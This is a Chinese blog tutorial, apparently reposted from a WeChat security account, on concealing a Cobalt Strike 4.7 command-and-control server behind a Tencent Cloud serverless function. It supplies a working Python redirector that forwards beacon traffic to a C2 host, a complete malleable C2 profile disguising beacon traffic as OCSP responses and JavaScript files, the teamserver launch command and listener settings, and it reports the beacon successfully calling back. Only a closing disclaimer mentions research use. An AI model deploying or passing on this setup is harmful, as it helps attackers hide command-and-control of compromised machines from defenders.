工具版本:cobalt strike 4.7云函数平台:腾讯云
云函数(Cloud Functions)是一种无服务器计算服务,它允许你运行代码而无需管理服务器。
云函数配置
1.新建函数
2.编辑代码
代码示例:
# coding: utf8
import json,requests,base64
def main_handler(event, context):
response = {}
path = None
headers = None
try:
C2='http://IP'
if'path'in event.keys():
path=event['path']
if'headers'in event.keys():
headers=event['headers']
if'httpMethod'in event.keys() and event['httpMethod'] == 'GET' :
resp=requests.get(C2+path,headers=headers,verify=False)
else:
resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
print(resp.headers)
print(resp.content)
response={
"isBase64Encoded": True,
"statusCode": resp.status_code,
"headers": dict(resp.headers),
"body": str(base64.b64encode(resp.content))[2:-1]
}
except Exception as e:
print('error')
print(e)
finally:
return response
3.创建触发器
4.触发管理
5.路径配置
如下图所示
6.发布服务
C2配置
新建<filename>.profile
文件
set sample_name "t";
set sleeptime "3000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get {
set uri "/api/x";
client {
header "Accept" "*/*";
metadata {
base64;
prepend "SESSIONID=";
header "Cookie";
}
}
server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Server" "Nodejs";
output {
base64;
print;
}
}
}
http-stager {
set uri_x86 "/vue.min.js";
set uri_x64 "/bootstrap-2.min.js";
}
http-post {
set uri "/api/y";
client {
header "Accept" "*/*";
id {
base64;
prepend "JSESSION=";
header "Cookie";
}
output {
base64;
print;
}
}
server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Connection" "keep-alive";
output {
base64;
print;
}
}
}
cobalt strike 4.7里面的c2lint
用不了,这里使用cobalt strike 4.3的来帮助我们检验我们编写的profile文件是否正确
cobalt strike 4.7启动
nohup ./teamserver.sh ip passswd c2.profile &
监听器配置
:::info注意:1.端口为80/443,Hosts为我们刚刚在API网关中的地址2.需要删除前面的 http:// 或者 https://3.需要删除后面的 :80 或者 :4434.选择监听器时要注意是https还是http::::::warning否则会无法成功上线!:::
HTTPS配置
HTTP配置
成功上线
参考:https://mp.weixin.qq.com/s/W7KBv3H5TcVbEjalAyn3zw
原文始发于微信公众号(Relay学安全):云函数隐藏C2
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论